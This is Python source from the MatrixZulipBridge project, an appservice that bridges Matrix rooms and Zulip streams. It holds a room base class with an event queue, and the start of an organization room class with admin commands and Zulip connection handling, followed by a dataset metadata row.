# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import logging
import re
from abc import ABC
from collections import defaultdict
from typing import TYPE_CHECKING, Callable, Iterable, Optional
from bidict import bidict
from mautrix.appservice import AppService as MauService
from mautrix.errors.base import IntentError
from mautrix.types import Membership
from mautrix.types.event.type import EventType
from matrixzulipbridge.event_queue import EventQueue
if TYPE_CHECKING:
from mautrix.types import Event, EventID, RoomID, StateEvent, UserID
from matrixzulipbridge.__main__ import BridgeAppService
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.types import ThreadEventID, ZulipTopicName, ZulipUserID
class RoomInvalidError(Exception):
pass
class InvalidConfigError(Exception):
pass
class Room(ABC):
az: MauService
id: "RoomID"
user_id: "UserID"
serv: "BridgeAppService"
members: list["UserID"]
lazy_members: Optional[dict["UserID", str]]
bans: list["UserID"]
displaynames: dict["UserID", str]
thread_last_message: dict["EventID", "EventID"]
threads: bidict["ZulipTopicName", "ThreadEventID"]
send_read_receipt: bool
_mx_handlers: dict[str, list[Callable[[dict], bool]]]
_queue: EventQueue
def __init__(
self,
id: "RoomID",
user_id: "UserID",
serv: "BridgeAppService",
members: list["UserID"],
bans: list["UserID"],
):
self.id = id
self.user_id = user_id
self.serv = serv
self.members = list(members)
self.bans = list(bans) if bans else []
self.lazy_members = None
self.displaynames = {}
self.last_messages = defaultdict(str)
self.thread_last_message = {}
self.threads = bidict()
self.send_read_receipt = True
self._mx_handlers = {}
self._queue = EventQueue(self._flush_events)
# start event queue
if self.id:
self._queue.start()
# we track room members
self.mx_register("m.room.member", self._on_mx_room_member)
self.init()
@classmethod
def init_class(cls, az: MauService):
cls.az = az
async def post_init(self):
pass
def from_config(self, config: dict) -> None:
if "threads" in config:
self.threads = bidict(config["threads"])
if "send_read_receipt" in config:
self.send_read_receipt = config["send_read_receipt"]
def init(self) -> None:
pass
def is_valid(self) -> bool:
return True
def cleanup(self):
self._queue.stop()
def to_config(self) -> dict:
return {
"threads": dict(self.threads),
"send_read_receipt": self.send_read_receipt,
}
async def save(self) -> None:
config = self.to_config()
config["type"] = type(self).__name__
config["user_id"] = self.user_id
await self.az.intent.set_account_data("zulip", config, self.id)
def mx_register(self, type: str, func: Callable[[dict], bool]) -> None:
if type not in self._mx_handlers:
self._mx_handlers[type] = []
self._mx_handlers[type].append(func)
async def on_mx_event(self, event: "Event") -> None:
handlers = self._mx_handlers.get(str(event.type), [self._on_mx_unhandled_event])
for handler in handlers:
await handler(event)
def in_room(self, user_id):
return user_id in self.members
async def on_mx_ban(self, user_id: "UserID") -> None:
pass
async def on_mx_unban(self, user_id: "UserID") -> None:
pass
async def on_mx_leave(self, user_id: "UserID") -> None:
pass
async def _on_mx_unhandled_event(self, event: "Event") -> None:
pass
async def _on_mx_room_member(self, event: "StateEvent") -> None:
if (
event.content.membership in [Membership.LEAVE, Membership.BAN]
and event.state_key in self.members
):
self.members.remove(event.state_key)
if event.state_key in self.displaynames:
del self.displaynames[event.state_key]
if event.state_key in self.last_messages:
del self.last_messages[event.state_key]
if not self.is_valid():
raise RoomInvalidError(
f"Room {self.id} ended up invalid after membership change, returning false from event handler."
)
if event.content.membership == Membership.LEAVE:
if event.prev_content.membership == Membership.BAN:
try:
self.bans.remove(event.state_key)
except ValueError:
pass
await self.on_mx_unban(event.state_key)
else:
await self.on_mx_leave(event.state_key)
if event.content.membership == Membership.BAN:
if event.state_key not in self.bans:
self.bans.append(event.state_key)
await self.on_mx_ban(event.state_key)
if event.content.membership == Membership.JOIN:
if event.state_key not in self.members:
self.members.append(event.state_key)
if event.content.displayname is not None:
self.displaynames[event.state_key] = str(event.content.displayname)
elif event.state_key in self.displaynames:
del self.displaynames[event.state_key]
async def _join(self, user_id: "UserID", nick=None):
await self.az.intent.user(user_id).ensure_joined(self.id, ignore_cache=True)
self.members.append(user_id)
if nick is not None:
self.displaynames[user_id] = nick
async def _flush_events(self, events: Iterable[dict]):
for event in events:
try:
await self._flush_event(event)
except Exception:
logging.exception("Queued event failed")
async def _flush_event(self, event: dict):
if event["type"] == "_join":
if event["user_id"] not in self.members:
await self._join(event["user_id"], event["nick"])
elif event["type"] == "_leave":
if self.lazy_members is not None and event["user_id"] in self.lazy_members:
del self.lazy_members[event["user_id"]]
if event["user_id"] in self.members:
if event["reason"] is not None:
await self.az.intent.user(event["user_id"]).kick_user(
self.id, event["user_id"], event["reason"]
)
else:
await self.az.intent.user(event["user_id"]).leave_room(self.id)
if event["user_id"] in self.members:
self.members.remove(event["user_id"])
if event["user_id"] in self.displaynames:
del self.displaynames[event["user_id"]]
elif event["type"] == "_kick":
if event["user_id"] in self.members:
await self.az.intent.kick_user(
self.id, event["user_id"], event["reason"]
)
self.members.remove(event["user_id"])
if event["user_id"] in self.displaynames:
del self.displaynames[event["user_id"]]
elif event["type"] == "_ensure_zulip_user_id":
await self.serv.ensure_zulip_user_id(
event["organization"],
zulip_user_id=event["zulip_user_id"],
zulip_user=event["zulip_user"],
)
elif event["type"] == "_redact":
await self.az.intent.redact(
room_id=self.id,
event_id=event["event_id"],
reason=event["reason"],
)
elif event["type"] == "_permission":
if len(event["content"]["users"]) == 0:
return # No need to send an empty event
try:
await self.az.intent.set_power_levels(
room_id=self.id,
content=event["content"],
)
except IntentError:
pass
elif "state_key" in event:
intent = self.az.intent
if event["user_id"]:
intent = intent.user(event["user_id"])
await intent.send_state_event(
self.id,
EventType.find(event["type"]),
state_key=event["state_key"],
content=event["content"],
)
else:
bridge_data = event["content"].get("lv.shema.zulipbridge")
if bridge_data is None:
bridge_data = {}
if (
bridge_data.get("type") == "message"
and bridge_data.get("target") == "stream"
):
thread_id = self.threads.get(bridge_data["zulip_topic"])
if thread_id is None:
logging.error(
f"Thread not created for topic: {bridge_data['zulip_topic']}"
)
return
event["content"]["m.relates_to"] = {
"event_id": thread_id,
"rel_type": "m.thread",
}
# https://spec.matrix.org/v1.9/client-server-api/#fallback-for-unthreaded-clients
if thread_id in self.thread_last_message:
event["content"]["m.relates_to"]["is_falling_back"] = True
event["content"]["m.relates_to"]["m.in_reply_to"] = {
"event_id": self.thread_last_message[thread_id]
}
if bridge_data.get("reply_to") is not None:
if "m.relates_to" not in event["content"]:
event["content"]["m.relates_to"] = {}
event["content"]["m.relates_to"]["is_falling_back"] = False
event["content"]["m.relates_to"]["m.in_reply_to"] = {
"event_id": bridge_data.get("reply_to")
}
intent = (
self.az.intent.user(event["user_id"])
if event["user_id"]
else self.az.intent
)
if "zulip_user_id" in bridge_data and "display_name" in bridge_data:
# TODO: Check if the display name is already cached
await intent.set_displayname(bridge_data["display_name"])
# Remove bridge data before sending it to Matrix
# This saves a few bytes!
event["content"].pop("lv.shema.zulipbridge", None)
timestamp = None
if "timestamp" in bridge_data:
timestamp = bridge_data["timestamp"] * 1000
event_type = EventType.find(event["type"])
# Skip creating a new thread if it already exists
if (
bridge_data.get("type") == "topic"
and bridge_data["zulip_topic"] in self.threads
):
return
event_id = await intent.send_message_event(
self.id,
event_type,
event["content"],
timestamp=timestamp,
)
if (
"m.relates_to" in event["content"]
and event["content"]["m.relates_to"].get("rel_type") == "m.thread"
):
self.thread_last_message[
event["content"]["m.relates_to"]["event_id"]
] = event_id
match bridge_data.get("type"):
case "message":
# Is this efficient?
self.messages[str(bridge_data["zulip_message_id"])] = event_id
await self.save()
if self.send_read_receipt and self.organization.zulip is not None:
# Send read receipt to Zulip
self.organization.zulip.update_message_flags(
{
"messages": [bridge_data["zulip_message_id"]],
"op": "add",
"flag": "read",
}
)
case "topic":
self.threads[bridge_data["zulip_topic"]] = event_id
await self.save()
# send message to mx user (may be puppeted)
def send_message(
self,
text: str,
user_id: Optional["UserID"] = None,
formatted: str = None,
fallback_html: Optional[str] = None,
thread_id: Optional[str] = None,
custom_data: Optional[dict] = None,
) -> None:
if formatted:
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.text",
"format": "org.matrix.custom.html",
"body": text,
"formatted_body": formatted,
},
"user_id": user_id,
"fallback_html": fallback_html,
}
else:
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.text",
"body": text,
},
"user_id": user_id,
"fallback_html": fallback_html,
}
if thread_id:
event["content"]["m.relates_to"] = {
"event_id": thread_id,
"rel_type": "m.thread",
}
if custom_data is not None:
event["content"]["lv.shema.zulipbridge"] = custom_data
if "lv.shema.zulipbridge" in event["content"]:
bridge_data: dict = event["content"]["lv.shema.zulipbridge"]
if bridge_data["type"] == "message" and bridge_data["target"] == "stream":
self._ensure_thread_for_topic(bridge_data.copy(), user_id)
self._queue.enqueue(event)
def redact(self, event_id: "EventID", reason: Optional[str] = None) -> None:
event = {"type": "_redact", "event_id": event_id, "reason": reason}
self._queue.enqueue(event)
def _ensure_thread_for_topic(
self, bridge_data: dict, mx_user_id: Optional["UserID"] = None
) -> Optional[str]:
zulip_topic = bridge_data["zulip_topic"]
if zulip_topic in self.threads:
return self.threads[zulip_topic]
bridge_data["type"] = "topic"
# Send topic name as a message
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.text",
"body": zulip_topic,
"lv.shema.zulipbridge": bridge_data,
},
"user_id": mx_user_id,
}
self._queue.enqueue(event)
return None
# send emote to mx user (may be puppeted)
def send_emote(
self,
text: str,
user_id: Optional["UserID"] = None,
fallback_html: Optional[str] = None,
) -> None:
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.emote",
"body": text,
},
"user_id": user_id,
"fallback_html": fallback_html,
}
self._queue.enqueue(event)
# send notice to mx user (may be puppeted)
def send_notice(
self,
text: str,
user_id: Optional["UserID"] = None,
formatted: str = None,
fallback_html: Optional[str] = None,
) -> None:
if formatted:
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.notice",
"format": "org.matrix.custom.html",
"body": text,
"formatted_body": formatted,
},
"user_id": user_id,
"fallback_html": fallback_html,
}
else:
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.notice",
"body": text,
},
"user_id": user_id,
"fallback_html": fallback_html,
}
self._queue.enqueue(event)
# send notice to mx user (may be puppeted)
def send_notice_html(self, text: str, user_id: Optional["UserID"] = None) -> None:
event = {
"type": "m.room.message",
"content": {
"msgtype": "m.notice",
"body": re.sub("<[^<]+?>", "", text),
"format": "org.matrix.custom.html",
"formatted_body": text,
},
"user_id": user_id,
}
self._queue.enqueue(event)
def react(
self, event_id: "EventID", text: str, user_id: Optional["UserID"] = None
) -> None:
event = {
"type": "m.reaction",
"content": {
"m.relates_to": {
"event_id": event_id,
"key": text,
"rel_type": "m.annotation",
}
},
"user_id": user_id,
}
self._queue.enqueue(event)
def set_topic(self, topic: str, user_id: Optional["UserID"] = None) -> None:
event = {
"type": "m.room.topic",
"content": {
"topic": topic,
},
"state_key": "",
"user_id": user_id,
}
self._queue.enqueue(event)
def join(self, user_id: "UserID", nick=None, lazy=False) -> None:
event = {
"type": "_join",
"content": {},
"user_id": user_id,
"nick": nick,
"lazy": lazy,
}
self._queue.enqueue(event)
def leave(self, user_id: "UserID", reason: Optional[str] = None) -> None:
event = {
"type": "_leave",
"content": {},
"reason": reason,
"user_id": user_id,
}
self._queue.enqueue(event)
def rename(self, old_nick: str, new_nick: str) -> None:
event = {
"type": "_rename",
"content": {},
"old_nick": old_nick,
"new_nick": new_nick,
}
self._queue.enqueue(event)
def kick(self, user_id: "UserID", reason: str) -> None:
event = {
"type": "_kick",
"content": {},
"reason": reason,
"user_id": user_id,
}
self._queue.enqueue(event)
def ensure_zulip_user_id(
self,
organization: "OrganizationRoom",
zulip_user_id: "ZulipUserID" = None,
zulip_user=None,
):
event = {
"type": "_ensure_zulip_user_id",
"content": {},
"organization": organization,
"zulip_user": zulip_user,
"zulip_user_id": zulip_user_id,
}
self._queue.enqueue(event)
async def sync_permissions(self, permissions: dict):
room_power_levels = await self.az.intent.get_power_levels(
self.id, ensure_joined=False
)
permissions = room_power_levels.users | permissions
if permissions == room_power_levels.users:
logging.debug(f"Nothing chnaged: {permissions=}")
return # Nothing changed
self._queue.enqueue(
{
"type": "_permission",
"content": {
"users": permissions,
},
}
)
| 20,747 | Python | .py | 528 | 27.179924 | 115 | 0.524574 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,591 | organization_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/organization_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import argparse
import asyncio
import datetime
import functools
import html
import json
import logging
import re
from argparse import Namespace
from typing import TYPE_CHECKING, Any, Optional
import zulip
from bidict import bidict
from mautrix.util.bridge_state import BridgeStateEvent
from matrixzulipbridge import __version__
from matrixzulipbridge.command_parse import (
CommandManager,
CommandParser,
CommandParserError,
)
from matrixzulipbridge.direct_room import DirectRoom
from matrixzulipbridge.personal_room import PersonalRoom
from matrixzulipbridge.room import InvalidConfigError, Room
from matrixzulipbridge.space_room import SpaceRoom
from matrixzulipbridge.stream_room import StreamRoom
# pylint: disable=unused-import
from matrixzulipbridge.under_organization_room import connected
from matrixzulipbridge.zulip import ZulipEventHandler
if TYPE_CHECKING:
from mautrix.types import UserID
from matrixzulipbridge.appservice import AppService
from matrixzulipbridge.types import ZulipUserID
class OrganizationRoom(Room):
# configuration stuff
name: str
connected: bool
fullname: str
api_key: str
email: str
site: str
zulip: "zulip.Client"
zulip_users: dict["ZulipUserID", dict]
zulip_puppet_login: dict["UserID", dict]
zulip_puppets: dict["UserID", "zulip.Client"]
zulip_puppet_user_mxid: bidict["ZulipUserID", "UserID"]
# state
commands: CommandManager
rooms: dict[str, Room]
direct_rooms: dict[frozenset["ZulipUserID"], "DirectRoom"]
connecting: bool
backoff: int
backoff_task: Any
connected_at: int
space: SpaceRoom
post_init_done: bool
disconnect: bool
organization: "OrganizationRoom"
profile: dict
server: dict
messages: dict[str, str]
permissions: dict[str, str]
zulip_handler: "ZulipEventHandler"
max_backfill_amount: int
relay_moderation: bool
deactivated_users: set["ZulipUserID"]
def init(self):
self.name = None
self.connected = False
self.fullname = None
self.backoff = 0
self.backoff_task = None
self.connected_at = 0
self.api_key = None
self.email = None
self.site = None
self.zulip_users = {}
self.zulip_puppet_login = {}
self.zulip_puppets = {}
self.zulip_puppet_user_mxid = bidict()
self.commands = CommandManager()
self.zulip = None
self.rooms = {}
self.direct_rooms = {}
self.connlock = asyncio.Lock()
self.disconnect = True
self.space = None
self.organization = self
self.profile = None
self.server = None
self.messages = {}
self.permissions = {}
self.zulip_handler = None
self.max_backfill_amount = 100
self.relay_moderation = True
self.deactivated_users = set()
cmd = CommandParser(
prog="FULLNAME",
description="set/change full name",
epilog=(
"You can always see your current full name on the organization without arguments.\n"
),
)
cmd.add_argument("fullname", nargs="?", help="new full name")
self.commands.register(cmd, self.cmd_fullname)
cmd = CommandParser(
prog="SITE",
description="set Zulip site",
)
cmd.add_argument("site", nargs="?", help="new site")
self.commands.register(cmd, self.cmd_site)
cmd = CommandParser(
prog="EMAIL",
description="set Zulip bot email",
)
cmd.add_argument("email", nargs="?", help="new bot email")
self.commands.register(cmd, self.cmd_email)
cmd = CommandParser(
prog="APIKEY",
description="set Zulip bot api key",
)
cmd.add_argument("api_key", nargs="?", help="new API key")
self.commands.register(cmd, self.cmd_apikey)
cmd = CommandParser(
prog="CONNECT",
description="connect to organization",
epilog=(
"When this command is invoked the connection to this organization will be persisted across disconnects and"
" bridge restart.\n"
"Only if the server KILLs your connection it will stay disconnected until CONNECT is invoked again.\n"
"\n"
"If you want to cancel automatic reconnect you need to issue the DISCONNECT command.\n"
),
)
self.commands.register(cmd, self.cmd_connect)
cmd = CommandParser(
prog="DISCONNECT",
description="disconnect from organization",
epilog=(
"In addition to disconnecting from an active organization connection this will also cancel any automatic"
"reconnection attempt.\n"
),
)
self.commands.register(cmd, self.cmd_disconnect)
cmd = CommandParser(prog="RECONNECT", description="reconnect to organization")
self.commands.register(cmd, self.cmd_reconnect)
cmd = CommandParser(
prog="SUBSCRIBE",
description="bridge a stream",
epilog=(
"Manually subscribe to a stream and bridge it\n"
"\n"
"Any subscriptions will be persisted between reconnects.\n"
"\n"
"Specifying a room will make the bridge join that room, instead of creating a new one\n"
),
)
cmd.add_argument("stream", help="target stream")
cmd.add_argument(
"backfill", nargs="?", help="number of messages to backfill", type=int
)
cmd.add_argument("room", nargs="?", help="room ID")
self.commands.register(cmd, self.cmd_subscribe)
cmd = CommandParser(
prog="UNSUBSCRIBE",
description="unbridge a stream and leave the room",
)
cmd.add_argument("stream", help="target stream")
self.commands.register(cmd, self.cmd_unsubscribe)
cmd = CommandParser(
prog="SPACE", description="join/create a space for this organization"
)
self.commands.register(cmd, self.cmd_space)
cmd = CommandParser(
prog="SYNCPERMISSIONS", description="resync all permissions"
)
self.commands.register(cmd, self.cmd_syncpermissions)
cmd = CommandParser(prog="PROFILE", description="fetch our Zulip profile")
self.commands.register(cmd, self.cmd_profile)
cmd = CommandParser(
prog="ROOM",
description="run a room command from organization room",
epilog=(
"Try 'ROOM #foo' to get the list of commands for a room."
"If a command generates Zulip replies in a bouncer room they will appear in the room itself."
),
)
cmd.add_argument("target", help="Zulip stream name")
cmd.add_argument(
"command", help="Command and arguments", nargs=argparse.REMAINDER
)
self.commands.register(cmd, self.cmd_room)
cmd = CommandParser(
prog="STATUS", description="show current organization status"
)
self.commands.register(cmd, self.cmd_status)
cmd = CommandParser(
prog="BACKFILL",
description="set the default maximum amount of backfilled messages (0 to disable backfilling)",
)
cmd.add_argument("amount", nargs="?", help="new amount")
cmd.add_argument(
"--update", action="store_true", help="also set this to all existing rooms"
)
cmd.add_argument("--now", action="store_true", help="start backfilling now")
self.commands.register(cmd, self.cmd_backfill)
cmd = CommandParser(
prog="PERSONALROOM",
description="create a personal room",
)
self.commands.register(cmd, self.cmd_personalroom)
cmd = CommandParser(
prog="RELAYMODERATION",
description="Whether to relay bans to Zulip",
epilog="When a user is banned in one room, their Zulip account is deactivated and removed from all rooms.",
)
group = cmd.add_mutually_exclusive_group()
group.add_argument(
"--on",
help="turn relaying moderation on",
action="store_true",
)
group.add_argument(
"--off",
help="turn relaying moderation off",
action="store_true",
)
self.commands.register(cmd, self.cmd_relaymoderation)
self.mx_register("m.room.message", self.on_mx_message)
@staticmethod
async def create(serv: "AppService", organization: dict, user_id: "UserID", name):
room_id = await serv.create_room(
name, f"Organization room for {organization['name']}", [user_id]
)
room = OrganizationRoom(
room_id, user_id, serv, [serv.user_id, user_id], bans=[]
)
room.from_config(organization)
serv.register_room(room)
room.space = await SpaceRoom.create(room, [r.id for r in room.rooms.values()])
# calls the api and attaches rooms
await room.space.create_finalize()
await room.space.attach(room.id)
await room.save()
await room.show_help()
return room
def from_config(self, config: dict):
if "name" in config:
self.name = config["name"]
else:
raise InvalidConfigError("No name key in config for OrganizationRoom")
if "api_key" in config and config["api_key"]:
self.api_key = config["api_key"]
if "email" in config and config["email"]:
self.email = config["email"]
if "site" in config and config["site"]:
self.site = config["site"]
if "messages" in config and config["messages"]:
self.messages = config["messages"]
if "max_backfill_amount" in config and config["max_backfill_amount"]:
self.max_backfill_amount = config["max_backfill_amount"]
if "zulip_puppet_login" in config and config["zulip_puppet_login"]:
self.zulip_puppet_login = config["zulip_puppet_login"]
def to_config(self) -> dict:
return {
"name": self.name,
"api_key": self.api_key,
"email": self.email,
"site": self.site,
"messages": self.messages,
"max_backfill_amount": self.max_backfill_amount,
"zulip_puppet_login": self.zulip_puppet_login,
}
def is_valid(self) -> bool:
if self.name is None:
return False
# we require user to be in organization room or be connected with channels or PMs
if not self.in_room(self.user_id):
# if not connected (or trying to) we can clean up
if not self.connected:
return False
# only if post_init has been done and we're connected with no rooms clean up
if self.post_init_done and self.connected and len(self.rooms) == 0:
return False
return True
def cleanup(self) -> None:
logging.debug(f"Network {self.id} cleaning up")
# prevent reconnecting ever again
self.connected = False
self.disconnect = True
if self.backoff_task:
self.backoff_task.cancel()
self.backoff_task = None
logging.debug("... cancelled backoff task")
if self.zulip:
self.zulip = None
if self.space:
self.serv.unregister_room(self.space.id)
self.space.cleanup()
asyncio.ensure_future(
self.serv.leave_room(self.space.id, self.space.members)
)
logging.debug("... cleaned up space")
super().cleanup()
async def show_help(self):
self.send_notice_html(
f"Welcome to the organization room for <b>{html.escape(self.name)}</b>!"
)
try:
return await self.commands.trigger("HELP")
except CommandParserError as e:
return self.send_notice(str(e))
async def on_mx_message(self, event) -> None:
if str(event.content.msgtype) != "m.text" or event.sender == self.serv.user_id:
return
# ignore edits
if event.content.get_edit():
return
try:
lines = event.content.body.split("\n")
command = lines.pop(0)
tail = "\n".join(lines) if len(lines) > 0 else None
await self.commands.trigger(command, tail)
except CommandParserError as e:
self.send_notice(str(e))
async def cmd_connect(self, _args) -> None:
await self.connect()
@connected # pylint: disable=used-before-assignment
async def cmd_disconnect(self, _args) -> None:
self.disconnect = True
if self.backoff_task:
self.backoff_task.cancel()
self.backoff_task = None
self.backoff = 0
self.connected_at = 0
if self.connected:
self.connected = False
await self.save()
if self.zulip:
self.zulip = None
self.send_notice("Disconnected")
async def cmd_reconnect(self, _args) -> None:
await self.cmd_disconnect(Namespace())
await self.cmd_connect(Namespace())
@connected
async def cmd_subscribe(self, args) -> None:
stream = args.stream
for room in self.rooms.values():
if not isinstance(room, StreamRoom):
continue
if stream.lower() == room.name:
self.send_notice(f"Stream {stream} already exists at {room.id}.")
return
self.zulip.add_subscriptions([{"name": stream}])
room = await StreamRoom.create(
organization=self,
name=stream,
backfill=args.backfill,
room_id=args.room,
)
await room.backfill_messages()
@connected
async def cmd_unsubscribe(self, args) -> None:
stream = args.stream.lower()
room = None
for r in self.rooms.values():
if not isinstance(r, StreamRoom):
continue
if r.name.lower() == stream:
room = r
break
if room is None:
self.send_notice("No room with that name exists.")
return
self.serv.unregister_room(room.id)
room.cleanup()
await self.serv.leave_room(room.id, room.members)
del self.rooms[room.stream_id]
self.zulip.remove_subscriptions([stream])
self.send_notice(f"Unsubscribed from {stream} and removed room {room.id}.")
def get_fullname(self):
if self.fullname:
return self.fullname
return self.profile["full_name"]
async def cmd_fullname(self, args) -> None:
if args.fullname is None:
fullname = self.get_fullname()
if self.zulip and self.zulip.has_connected:
self.send_notice(f"Full name: {fullname}")
return
if self.zulip and self.zulip.has_connected:
self.zulip.update_user_by_id(
self.profile["user_id"], full_name=args.fullname
)
self.fullname = args.fullname
self.send_notice(f"Full name set to {self.fullname}")
async def cmd_site(self, args) -> None:
if not args.site:
self.send_notice(f"Zulip site is: {self.site}")
return
self.site = args.site
await self.save()
self.send_notice(f"Zulip site set to {self.site}")
async def cmd_email(self, args) -> None:
if not args.email:
self.send_notice(f"Bot email is: {self.email}")
return
self.email = args.email
await self.save()
self.send_notice(f"Bot email set to {self.email}")
async def cmd_apikey(self, args) -> None:
if not args.api_key:
self.send_notice(f"Bot API key is {'not ' if self.api_key else ''}set")
return
self.api_key = args.api_key
await self.save()
self.send_notice("Bot API Key changed")
async def cmd_profile(self, _args) -> None:
self.profile = self.zulip.get_profile()
self.send_notice(json.dumps(self.profile, indent=4))
async def cmd_room(self, args) -> None:
target = args.target.lower()
room = None
for r in self.rooms.values():
if not isinstance(r, StreamRoom):
continue
if r.name.lower() == target:
room = r
if not room:
self.send_notice(f"No room for {args.target}")
return
if len(args.command) == 0:
args.command = ["HELP"]
await room.commands.trigger_args(args.command, forward=True)
async def cmd_status(self, _args) -> None:
if self.connected_at > 0:
conntime = asyncio.get_running_loop().time() - self.connected_at
conntime = str(datetime.timedelta(seconds=int(conntime)))
self.send_notice(f"Connected for {conntime}")
else:
self.send_notice("Not connected to server.")
dms = []
streams = []
for room in self.rooms.values():
if isinstance(room, StreamRoom):
streams.append(room.name)
for dm_room in self.direct_rooms.values():
dms.append(dm_room.name)
if len(streams) > 0:
self.send_notice(f"Streams: #{', #'.join(streams)}")
if len(dms) > 0:
self.send_notice(f"Open DMs: {len(dms)}")
async def cmd_space(self, _args) -> None:
if self.space is None:
# sync create to prevent race conditions
self.space = SpaceRoom.create(
self, [room.id for room in self.rooms.values()]
)
# calls the api and attaches rooms
self.send_notice("Creating space and inviting you to it.")
await self.space.create_finalize()
else:
self.send_notice(f"Space already exists ({self.space.id}).")
async def cmd_syncpermissions(self, _args) -> None:
await self._sync_permissions()
self.send_notice("Permissions synched successfully")
async def cmd_backfill(self, args) -> None:
if args.amount:
self.max_backfill_amount = int(args.amount)
await self.save()
if args.update:
for room in self.rooms.values():
if not isinstance(room, DirectRoom):
continue
room.max_backfill_amount = self.max_backfill_amount
await room.save()
self.send_notice(
f"Set maximum backfill amount to {self.max_backfill_amount} and updated all rooms"
)
else:
self.send_notice(
f"Maximum backfill amount is set to: {self.max_backfill_amount}"
)
if args.now:
await self.backfill_messages()
async def cmd_personalroom(self, _args) -> None:
await PersonalRoom.create(self, self.user_id)
self.send_notice("Personal room created")
async def cmd_relaymoderation(self, args) -> None:
if args.on:
self.relay_moderation = True
await self.save()
elif args.off:
self.relay_moderation = False
await self.save()
self.send_notice(
f"Relaying moderation is {'enabled' if self.relay_moderation else 'disabled'}",
)
async def connect(self) -> None:
if not self.is_valid():
logging.warning(
"Trying to connect an invalid organization {self.id}, this is likely a dangling organization."
)
return
if self.connlock.locked():
self.send_notice("Already connecting.")
return
async with self.connlock:
if self.zulip and self.connected:
self.send_notice("Already connected.")
return
self.disconnect = False
await self._connect()
async def post_init(self) -> None:
# attach loose sub-rooms to us
for room_type in [DirectRoom, StreamRoom, PersonalRoom]:
for room in self.serv.find_rooms(room_type, organization_id=self.id):
room.organization = self
logging.debug(f"{self.id} attaching {room.id}")
match room:
case StreamRoom():
self.rooms[room.stream_id] = room
case DirectRoom():
self.direct_rooms[frozenset(room.recipient_ids)] = room
case _:
self.rooms[room.id] = room
logging.debug(self.direct_rooms)
self.post_init_done = True
async def _connect(self) -> None:
if not self.site:
self.send_notice("Zulip site is not set!")
return
if not self.email:
self.send_notice("Bot email is not set!")
return
if not self.api_key:
self.send_notice("Bot API key is not set!")
return
# force cleanup
if self.zulip:
self.zulip = None
while not self.disconnect:
if self.name not in self.serv.config["organizations"]:
self.send_notice(
"This organization does not exist on this bridge anymore."
)
return
try:
asyncio.ensure_future(
self.serv.push_bridge_state(
BridgeStateEvent.CONNECTING, remote_id=self.name
)
)
self.zulip = zulip.Client(
self.email, api_key=self.api_key, site=self.site
)
if not self.connected:
self.connected = True
await self.save()
# awaiting above allows disconnect to happen in-between
if self.zulip is None:
logging.debug("Zulip disconnected")
return
self.disconnect = False
self.connected_at = asyncio.get_running_loop().time()
self.profile = self.zulip.get_profile()
self.server = self.zulip.get_server_settings()
self.zulip_handler = ZulipEventHandler(self)
# Start Zulip event listerner
asyncio.get_running_loop().run_in_executor(
None,
functools.partial(
self.zulip.call_on_each_event,
lambda event: self.zulip_handler.on_event( # pylint: disable=unnecessary-lambda
event
),
apply_markdown=True,
),
)
asyncio.ensure_future(self._on_connect())
self.send_notice(f"Connected to {self.site}")
asyncio.ensure_future(
self.serv.push_bridge_state(
BridgeStateEvent.CONNECTED, remote_id=self.name
)
)
return
except Exception as e:
self.send_notice(f"Failed to connect: {str(e)}")
if self.backoff < 1800:
self.backoff = self.backoff * 2
if self.backoff < 5:
self.backoff = 5
self.send_notice(f"Retrying in {self.backoff} seconds...")
self.backoff_task = asyncio.ensure_future(asyncio.sleep(self.backoff))
try:
await self.backoff_task
except asyncio.CancelledError:
break
finally:
self.backoff_task = None
self.send_notice("Connection aborted.")
async def _on_connect(self):
await self._get_users()
await self._login_zulip_puppets()
await self._sync_all_room_members()
await self._sync_permissions()
await self.backfill_messages()
async def _get_users(self):
result = self.zulip.get_members()
if result["result"] != "success":
raise Exception(f"Could not get Zulip users: {result['msg']}")
for user in result["members"]:
self.zulip_users[user["user_id"]] = user
if not user["is_active"]:
self.deactivated_users.add(str(user["user_id"]))
async def _login_zulip_puppets(self):
for user_id, login in self.zulip_puppet_login.items():
await self.login_zulip_puppet(user_id, login["email"], login["api_key"])
async def login_zulip_puppet(self, user_id: "UserID", email: str, api_key: str):
"""Create a Zulip puppet
Args:
user_id (str): MXID
email (str): Zulip account email
api_key (str): Zulip account API key
"""
client = zulip.Client(email, api_key=api_key, site=self.site)
self.zulip_puppets[user_id] = client
profile = client.get_profile()
if "user_id" not in profile:
return
self.zulip_puppet_user_mxid[str(profile["user_id"])] = user_id
# Create event queue for receiving DMs
asyncio.get_running_loop().run_in_executor(
None,
functools.partial(
